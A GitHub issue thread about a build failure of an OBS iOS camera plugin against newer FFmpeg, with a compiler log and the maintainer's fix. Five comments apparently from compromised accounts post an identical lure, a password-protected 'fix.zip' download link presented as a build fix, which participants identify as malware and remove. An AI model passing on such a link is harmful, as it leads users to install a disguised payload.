### ISSUE TITLE
Fails to build on Arch Linux due to ffmpeg breaking change

### ISSUE THREAD

**Issue by PancakeTAS** [dougg3/obs-ios-camera-source#25]
I'm guessing this project was designed for older ffmpeg versions and cmake tries to compile against new ones?
```
pancake@cute ~/tmp/obs-ios-camera-source $ make
[  5%] Built target libcnary
[ 32%] Built target libplist
[ 38%] Built target libusbmuxd
[ 80%] Built target libimobiledevice
[ 88%] Built target portal
[ 89%] Building C object CMakeFiles/obs-ios-camera-source.dir/src/ffmpeg-decode.c.o
/home/pancake/tmp/obs-ios-camera-source/src/ffmpeg-decode.c: In function ‘ffmpeg_decode_init’:
/home/pancake/tmp/obs-ios-camera-source/src/ffmpeg-decode.c:27:19: warning: assignment discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
   27 |     decode->codec = avcodec_find_decoder(id);
      |                   ^
/home/pancake/tmp/obs-ios-camera-source/src/ffmpeg-decode.c: In function ‘ffmpeg_decode_free’:
/home/pancake/tmp/obs-ios-camera-source/src/ffmpeg-decode.c:55:9: warning: ‘avcodec_close’ is deprecated [-Wdeprecated-declarations]
   55 |         avcodec_close(decode->decoder);
      |         ^~~~~~~~~~~~~
In file included from /home/pancake/tmp/obs-ios-camera-source/src/ffmpeg-decode.h:32,
                 from /home/pancake/tmp/obs-ios-camera-source/src/ffmpeg-decode.c:18:
/usr/include/libavcodec/avcodec.h:2387:5: note: declared here
 2387 | int avcodec_close(AVCodecContext *avctx);
      |     ^~~~~~~~~~~~~
/home/pancake/tmp/obs-ios-camera-source/src/ffmpeg-decode.c: In function ‘ffmpeg_decode_audio’:
/home/pancake/tmp/obs-ios-camera-source/src/ffmpeg-decode.c:209:52: error: ‘AVCodecContext’ has no member named ‘channels’
  209 |     convert_speaker_layout((uint8_t)decode->decoder->channels);
      |                                                    ^~
make[2]: *** [CMakeFiles/obs-ios-camera-source.dir/build.make:104: CMakeFiles/obs-ios-camera-source.dir/src/ffmpeg-decode.c.o] Error 1
make[1]: *** [CMakeFiles/Makefile2:112: CMakeFiles/obs-ios-camera-source.dir/all] Error 2
make: *** [Makefile:136: all] Error 2
```

Straight up removing the line in the error actually makes it build and work just fine on OBS 30.2.1, didn't test sound though

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PancakeTAS** [comment]
omg what the heck do you want from me stop sending my viruses

**Comment by dougg3** [comment]
Thanks for the report and info about how you tweaked the code to make it compile! I will take a look later and see if I can figure out if there is a "correct" way to handle the channels in newer versions of FFmpeg.

Also, those virus comments were weird! I reported one of them to GitHub and deleted them all.

**Comment by nxllxvxxd** [comment]
> Thanks for the report and info about how you tweaked the code to make it compile! I will take a look later and see if I can figure out if there is a "correct" way to handle the channels in newer versions of FFmpeg.
> 
> Also, those virus comments were weird! I reported one of them to GitHub and deleted them all.

There is currently a bunch of accounts getting compromised and they are then using the accounts they compromise to spread it, I woke up this morning to a bunch of shit like this posted on my account I am sorry for any trouble it may have caused

**Comment by PancakeTAS** [comment]
I guess while we're at it, I might as well dump the entire cmake here (patch applied), as it looks like there's a lot of deprecated things being used..

[compilelog.txt](https://github.com/user-attachments/files/16753340/compilelog.txt)

**Comment by dougg3** [comment]
Hi @PancakeTAS, thanks again for reporting this! I went ahead and fixed all the errors and warnings related to FFmpeg. There are more warnings in the bundled libimobiledevice, but that would take more effort to figure out and I don't have the time right now. You should be good to go now -- it compiles just fine in Arch for me after these fixes.

**Comment by PancakeTAS** [comment]
Works amazingly thank you!
